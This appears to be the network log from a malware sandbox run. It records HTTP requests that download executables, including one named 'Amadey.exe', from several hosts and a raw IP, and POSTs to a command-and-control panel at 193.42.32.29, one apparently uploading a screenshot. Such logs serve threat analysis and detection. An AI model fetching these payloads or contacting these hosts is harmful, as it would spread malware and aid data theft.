Network Analysis

GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 16 Oct 2023 02:05:20 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Mon, 16 Oct 2023 02:05:20 GMT Server: cloudflare CF-RAY: 816cbc7778741031-LAX

GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: flyawayaero.net Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Mon, 16 Oct 2023 02:05:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://potatogoose.com/8f4abd327a215517f84d72009a830cea/baf14778c246e15550645e30ba78ce1c.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z152H1EUswDAjCj03N%2FhQ7KAAYGOuBCCRMbS1DE7maWaAiN%2FNiOJwaK1%2FW6f6KySA57OoksoZOlB84rR%2FVkTokiZhS6HchIZWDSxJX92D8oJ1rlt0Vaw5FQ2mhTG5YUCpGs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 816cbd218c88838a-KIX alt-svc: h3=":443"; ma=86400

GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1 Host: logicmouse.net Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Mon, 16 Oct 2023 02:05:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://thegrandduck.org/8f4abd327a215517f84d72009a830cea/6779d89b7a368f4f3f340b50a9d18d71.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFgyryTZGHx3NgZOYud%2BDYZNz75xo7D2YTgneVBbhbCwq744ZMMKuTD6I3DoAjGlWY1HU%2BdtOAnncweUE8U3wD52Gz9ZjpeWUaeHKTgKenMuxezhQNG6%2FecF5ZY22FJ4Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 816cbd295d6d8d13-KIX alt-svc: h3=":443"; ma=86400

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Oct 2023 02:05:51 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename=OperaSetup.exe ETag: "d6e3673b1f679c7e27f602e50c1949fe" Strict-Transport-Security: max-age=31536000; includeSubDomains

GET /files/My2.exe HTTP/1.1 Host: 85.217.144.143 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 16 Oct 2023 02:05:45 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Thu, 12 Oct 2023 02:11:41 GMT ETag: "53d718-6077b75f2e86b" Accept-Ranges: bytes Content-Length: 5494552 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /files/Amadey.exe HTTP/1.1 Host: 85.217.144.143

HTTP/1.1 200 OK Date: Mon, 16 Oct 2023 02:05:47 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Sun, 01 Oct 2023 10:41:57 GMT ETag: "38800-606a54e8fc226" Accept-Ranges: bytes Content-Length: 231424 Content-Type: application/x-msdownload

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 16 Oct 2023 02:05:48 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 16 Oct 2023 03:05:52 GMT Date: Mon, 16 Oct 2023 02:05:52 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 16 Oct 2023 03:05:56 GMT Date: Mon, 16 Oct 2023 02:05:56 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 16 Oct 2023 03:06:01 GMT Date: Mon, 16 Oct 2023 02:06:01 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 16 Oct 2023 03:06:06 GMT Date: Mon, 16 Oct 2023 02:06:06 GMT Connection: keep-alive

GET /build.exe HTTP/1.1 Host: guboh2p.top Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Oct 2023 02:06:18 GMT Content-Type: application/octet-stream Content-Length: 334848 Connection: keep-alive Last-Modified: Mon, 16 Oct 2023 00:15:00 GMT ETag: "51c00-607ca4c05f2ed" Accept-Ranges: bytes

POST /9bDc8sQ/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.42.32.29 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Oct 2023 02:06:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /9bDc8sQ/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MjQwODM= Host: 193.42.32.29 Content-Length: 24235 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Oct 2023 02:06:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive